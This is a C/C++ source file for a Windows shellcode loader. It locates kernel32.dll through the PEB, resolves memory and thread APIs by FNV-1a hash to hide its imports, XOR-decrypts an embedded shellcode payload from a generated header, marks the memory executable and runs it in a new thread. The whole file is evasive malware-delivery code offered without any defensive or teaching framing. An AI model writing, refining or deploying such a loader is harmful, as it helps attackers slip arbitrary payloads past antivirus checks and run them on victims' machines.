#include <windows.h>
#include <winternl.h>
#include <stdint.h>
#include <stdio.h>

// --- Configuration ---
#define XOR_KEY 0xAB          // Must match the Python script
// --------------------

// FNV-1a hash function for API names
constexpr uint32_t fnv1a_hash(const char* str) {
    uint32_t hash = 0x811c9dc5;
    while (*str) {
        hash ^= static_cast<uint8_t>(*str);
        hash *= 0x01000193;
        str++;
    }
    return hash;
}

// Pre-computed hashes for the APIs we need (generated at compile time)
constexpr uint32_t VIRTUAL_ALLOC_HASH = fnv1a_hash("VirtualAlloc");
constexpr uint32_t VIRTUAL_PROTECT_HASH = fnv1a_hash("VirtualProtect");
constexpr uint32_t CREATE_THREAD_HASH = fnv1a_hash("CreateThread");
constexpr uint32_t WAIT_FOR_SINGLE_OBJECT_HASH = fnv1a_hash("WaitForSingleObject");

// Function pointer types
typedef LPVOID (WINAPI *pVirtualAlloc)(LPVOID, SIZE_T, DWORD, DWORD);
typedef BOOL (WINAPI *pVirtualProtect)(LPVOID, SIZE_T, DWORD, PDWORD);
typedef HANDLE (WINAPI *pCreateThread)(LPSECURITY_ATTRIBUTES, SIZE_T, LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD);
typedef DWORD (WINAPI *pWaitForSingleObject)(HANDLE, DWORD);

// Function to resolve API by hash from kernel32.dll
FARPROC resolve_api_by_hash(uint32_t hash) {
    // Get base address of kernel32.dll from PEB
    PPEB peb = (PPEB)__readgsqword(0x60);
    PEB_LDR_DATA* ldr = peb->Ldr;
    LIST_ENTRY* head = &ldr->InMemoryOrderModuleList;
    LIST_ENTRY* entry = head->Flink;
    
    while (entry != head) {
        LDR_DATA_TABLE_ENTRY* module = CONTAINING_RECORD(entry, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
        if (module->DllBase) {
            PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)module->DllBase;
            if (dos->e_magic == IMAGE_DOS_SIGNATURE) {
                PIMAGE_NT_HEADERS nt = (PIMAGE_NT_HEADERS)((BYTE*)module->DllBase + dos->e_lfanew);
                if (nt->Signature == IMAGE_NT_SIGNATURE) {
                    // Check if this is kernel32.dll by comparing module name
                    WCHAR* moduleName = module->FullDllName.Buffer;
                    if (moduleName && wcsstr(moduleName, L"kernel32.dll")) {
                        // Parse export table
                        IMAGE_DATA_DIRECTORY exportDir = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
                        PIMAGE_EXPORT_DIRECTORY exports = (PIMAGE_EXPORT_DIRECTORY)((BYTE*)module->DllBase + exportDir.VirtualAddress);
                        
                        DWORD* names = (DWORD*)((BYTE*)module->DllBase + exports->AddressOfNames);
                        WORD* ordinals = (WORD*)((BYTE*)module->DllBase + exports->AddressOfNameOrdinals);
                        DWORD* functions = (DWORD*)((BYTE*)module->DllBase + exports->AddressOfFunctions);
                        
                        for (DWORD i = 0; i < exports->NumberOfNames; i++) {
                            const char* funcName = (const char*)module->DllBase + names[i];
                            // Skip non-alphanumeric characters at the start (some APIs have @ prefixes)
                            while (*funcName && (*funcName < 'A' || *funcName > 'z')) funcName++;
                            
                            if (fnv1a_hash(funcName) == hash) {
                                return (FARPROC)((BYTE*)module->DllBase + functions[ordinals[i]]);
                            }
                        }
                    }
                }
            }
        }
        entry = entry->Flink;
    }
    return NULL;
}

// The encrypted shellcode (generated by Python script and compiled in)
// This array will be populated by the Python script
#include "encrypted_shellcode.h"

int main() {
    // Step 1: Dynamically resolve the APIs we need
    pVirtualAlloc _VirtualAlloc = (pVirtualAlloc)resolve_api_by_hash(VIRTUAL_ALLOC_HASH);
    pVirtualProtect _VirtualProtect = (pVirtualProtect)resolve_api_by_hash(VIRTUAL_PROTECT_HASH);
    pCreateThread _CreateThread = (pCreateThread)resolve_api_by_hash(CREATE_THREAD_HASH);
    pWaitForSingleObject _WaitForSingleObject = (pWaitForSingleObject)resolve_api_by_hash(WAIT_FOR_SINGLE_OBJECT_HASH);
    
    if (!_VirtualAlloc || !_VirtualProtect || !_CreateThread || !_WaitForSingleObject) {
        return -1;
    }
    
    // Step 2: Allocate memory for the decrypted shellcode
    LPVOID exec_mem = _VirtualAlloc(NULL, shellcode_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (!exec_mem) {
        return -1;
    }
    
    // Step 3: Copy the encrypted shellcode to the allocated memory
    memcpy(exec_mem, encryptedShellcode, shellcode_len);
    
    // Step 4: Decrypt the shellcode in memory using XOR
    PBYTE ptr = (PBYTE)exec_mem;
    for (unsigned int i = 0; i < shellcode_len; i++) {
        ptr[i] = ptr[i] ^ XOR_KEY;
    }
    
    // Step 5: Change memory protection to executable
    DWORD oldProtect;
    BOOL prot_result = _VirtualProtect(exec_mem, shellcode_len, PAGE_EXECUTE_READ, &oldProtect);
    if (!prot_result) {
        return -1;
    }
    
    // Step 6: Execute the decrypted shellcode in a new thread
    HANDLE thread = _CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)exec_mem, NULL, 0, NULL);
    if (!thread) {
        return -1;
    }
    
    // Step 7: Wait for the thread to finish (the shellcode will keep running)
    _WaitForSingleObject(thread, INFINITE);
    
    return 0;
}